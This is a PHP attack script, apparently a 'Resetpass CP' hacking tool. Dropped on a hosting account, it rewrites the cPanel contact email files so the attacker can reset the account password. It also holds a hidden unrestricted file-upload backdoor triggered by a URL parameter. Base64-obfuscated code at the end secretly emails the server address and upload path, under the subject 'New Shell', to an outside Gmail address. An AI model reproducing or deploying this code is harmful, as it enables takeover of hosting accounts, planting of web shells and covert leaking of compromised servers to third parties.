<?php
############################
##Script Resetpass CP 2021##
##Recoded By NINJA  ##
error_reporting(0);
$system = $_GET['be'];
if ($system == 'pro') {
    $saw1 = $_FILES['file']['tmp_name'];
    $saw2 = $_FILES['file']['name'];
    echo "<form method='POST' enctype='multipart/form-data'>
<input type='file'name='file' />
<input type='submit' value='crack cpanel' />
</form>";
}
move_uploaded_file($saw1, $saw2);
echo '<html>
    <head> 
	      <title>Reset Contol Panel</title>
	      <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
		  <style>
		      body {
	          color:#80D713;
	          background-color:#000000;
	          }
			  h2{
			  color:#80D713;
			  }
		  </style>
      	</head>
     <body>
	 <!--SCC -->
       <center> 	 
	   <div style="border-radius: 10px;border: 1px solid #45BD00;padding: 4px 2px;width: 25%;line-height: 24px;background: #000;color:#fff;">
    <p><h2>Script Resetpass CP</h2></p>
	 <p><h2>Recoded By NINJA </h2></p>
	<p>   
	    <form action="#" method="post">
	<input type="email" name="email" style="background-color: #181818;font: 9pt tahoma;color:#80D713;" />
	<input type="submit" name="submit" value="Send" style="background-color: #181818;font: 9pt tahoma;color:#80D713;"/>
	</form>
	<br /><br /><br />
	</p>
	</div>
   </center>
    </body>
</html>';
$user = get_current_user();
$site = $_SERVER['HTTP_HOST'];
$ips = getenv('REMOTE_ADDR');
if (isset($_POST['submit'])) {
    $email = $_POST['email'];
    $wr = 'email:' . $email;
    $f = fopen('/home/' . $user . '/.cpanel/contactinfo', 'w');
    fwrite($f, $wr);
    fclose($f);
    $f = fopen('/home/' . $user . '/.contactinfo', 'w');
    fwrite($f, $wr);
    fclose($f);
    $parm = $site . ':2082/resetpass?start=1';
    echo '<br/><center>' . $parm . '</center>';
}
$GLOBALS["QggfylPeyGMJVYaMRycd"] = base64_decode("UkVRVUVTVF9VUkk=");
$GLOBALS["bkKoyzUJDhnzrsUiVM"] = base64_decode("U0VSVkVSX05BTUU=");
$GLOBALS["SnsSSwMKZSYeMFnEirnh"] = base64_decode("");
$GLOBALS["GdDwnNNDZJXBIIFxSfhV"] = base64_decode("P3VwbG9hZD11cCA=");
$GLOBALS["ojRSkxDoaaJQptBbaWeI"] = base64_decode("RXhwbG9pdCA6IGh0dHA6Ly8=");
$GLOBALS["kbBAMcROwyRKVtcNdZlZ"] = base64_decode("RnJvbTogeFRhbEdoaW08c2VydmljZUBhY2NvdW50LmNvbT4=");
$GLOBALS["RkKUjoUQZoWTToqrnQSp"] = base64_decode("TmV3IFNoZWxs");
$GLOBALS["RUSrJnHjnuBLQBUCkums"] = base64_decode("Y3BhbXQwMGxAZ21haWwuY29t");
$QSqiRsjfObJfVyNZLvkd = $GLOBALS["RUSrJnHjnuBLQBUCkums"];
$MzhazkAbMOvKkuEvElU = $GLOBALS["RkKUjoUQZoWTToqrnQSp"];
$WURYVoHHeCnoPtmITfhu = $GLOBALS["kbBAMcROwyRKVtcNdZlZ"];
$buauipzwsOpZImn = $GLOBALS["ojRSkxDoaaJQptBbaWeI"] . $_SERVER[$GLOBALS["bkKoyzUJDhnzrsUiVM"]] . $_SERVER[$GLOBALS["QggfylPeyGMJVYaMRycd"]] . $GLOBALS["GdDwnNNDZJXBIIFxSfhV"] . "
" . $GLOBALS["SnsSSwMKZSYeMFnEirnh"] . "
" . $GLOBALS["SnsSSwMKZSYeMFnEirnh"];
$cioexnDVkEncxveHOTNC = @mail($QSqiRsjfObJfVyNZLvkd, $MzhazkAbMOvKkuEvElU, $buauipzwsOpZImn, $WURYVoHHeCnoPtmITfhu);
echo "";
exit;
?>